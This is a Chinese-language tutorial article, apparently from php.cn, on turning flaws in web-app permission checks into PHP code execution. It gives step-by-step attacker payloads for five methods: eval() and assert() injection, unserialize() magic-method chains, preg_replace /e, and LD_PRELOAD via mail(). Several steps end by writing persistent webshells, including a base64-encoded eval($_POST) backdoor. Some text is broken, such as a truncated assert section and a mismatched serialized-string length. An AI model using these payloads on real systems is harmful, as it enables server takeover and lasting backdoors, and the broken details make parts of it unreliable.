权限验证如何触发php代码执行_权限验证触发php代码执行方法【技巧】

星夢妙者
发布: 2025-12-22 21:47:45
原创
128人浏览过
攻击者可通过eval()注入、反序列化漏洞及assert()函数绕过权限验证执行PHP代码:一、利用未过滤的eval()执行恶意角色参数;二、通过unserialize()触发危险魔术方法;三、用assert()替代eval()执行传入表达式。

权限验证如何触发php代码执行_权限验证触发php代码执行方法【技巧】

当Web应用程序在权限验证环节存在逻辑缺陷或不安全的代码调用时,攻击者可能通过构造特定请求绕过校验并触发PHP代码执行。以下是几种常见的权限验证触发PHP代码执行的方法:

一、利用eval()函数配合未过滤的权限参数

某些系统将用户角色、模块标识等权限信息以字符串形式传入eval()执行,若该字符串未经过严格白名单校验,可被注入恶意PHP代码。

1、识别目标页面中是否存在类似eval("return $role_check;");的动态执行逻辑。

2、在请求中提交包含PHP代码的role参数,例如:role=1; phpinfo(); exit;

立即学习PHP免费学习笔记(深入)”;

3、观察响应体是否输出phpinfo()结果或报错信息中暴露代码执行痕迹。

4、确认成功后,替换为更隐蔽的payload,如:role=1; @file_put_contents('shell.php', base64_decode('PD9waHAgZXZhbCgkX1BPU1RbJ3o0J10pOz8+')); exit;

二、通过反序列化漏洞在权限校验流程中触发__wakeup()或__destruct()

部分权限验证模块使用unserialize()解析用户可控的sessioncookie数据,若类中定义了危险魔术方法且存在可利用的链,则可在反序列化过程中执行任意PHP代码。

1、捕获登录或鉴权请求中的serialized字符串,例如Cookie中的user_token=O:8:"UserAuth":1:{s:4:"role";s:5:"admin";}

2、查找应用源码中已定义且含危险操作的类,重点关注__wakeup()内调用system()、exec()或file_put_contents()的类。

3、构造恶意序列化字符串,使反序列化后触发代码执行,例如注入s:4:"cmd";s:12:"whoami > a.txt";并匹配对应属性。

4、发送篡改后的序列化数据至权限验证接口,检查服务器是否生成预期文件或执行命令。

三、利用assert()函数替代eval()执行传入表达式

PHP低版本(

1、搜索代码中形如assert($_GET['perm'] . ' === "admin"');的语句。

2、向perm参数提交闭合原表达式的payload,例如:perm=1); phpinfo(); //

Stable Video
Stable Video

Stability AI 发布的开源AI视频大模型,用文字或图像创建视频,把你的概念变成迷人的电影

Stable Video 227
查看详情 Stable Video

3、验证响应中是否出现phpinfo()输出,确认assert成功执行后续代码。

4、部署持久化payload:perm=1); @file_put_contents('backdoor.php', $_POST['x']); //

四、借助preg_replace()的/e修饰符执行替换内容

旧版PHP支持preg_replace()的e修饰符,允许在替换字符串中执行PHP代码。若权限校验中存在类似preg_replace('/(.*)/e', 'strtoupper("\1")', $_GET['input'])且$input可控,则可触发执行。

1、定位使用了/e修饰符的正则替换逻辑,尤其关注$_GET、$_POST、$_COOKIE等变量作为模式或替换参数。

2、构造匹配规则使替换内容成为可执行PHP代码,例如:input={${phpinfo()}}(需配合特定正则模式)。

3、若正则允许任意字符匹配,尝试提交input=xxx; system($_GET['cmd']);并设置e修饰符。

4、发送请求并检查是否触发命令执行,成功后使用:input=1; @file_put_contents('rce.php', base64_decode($_GET['p']));

五、通过LD_PRELOAD环境变量配合mail()或error_log()触发本地代码执行

在部分Linux服务器上,若权限验证流程中调用了mail()或error_log()且启用了sendmail路径可控,结合LD_PRELOAD劫持可实现PHP代码执行。

1、确认PHP配置中disable_functions未禁用mail()或error_log(),且open_basedir未限制临时目录。

2、上传编译好的共享对象文件(如log.so),其中__attribute__((constructor))函数调用system()。

3、设置环境变量:putenv("LD_PRELOAD=/tmp/log.so");,再调用mail()或error_log()触发加载。

4、构造最终触发链:mail('a@b.c', '', '', '', '-f'.$_GET['x']); 并配合LD_PRELOAD注入。

以上就是权限验证如何触发php代码执行_权限验证触发php代码执行方法【技巧】的详细内容,更多请关注php中文网其它相关文章!

PHP速学教程(入门到精通)
PHP速学教程(入门到精通)

PHP怎么学习?PHP怎么入门?PHP在哪学?PHP怎么学才快?不用担心,这里为大家提供了PHP速学教程(入门到精通),有需要的小伙伴保存下载就能学习啦!

下载
来源:php中文网
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
最新问题
开源免费商场系统广告
热门教程
更多>
最新下载
更多>
网站特效
网站源码
网站素材
前端模板
关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送

Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号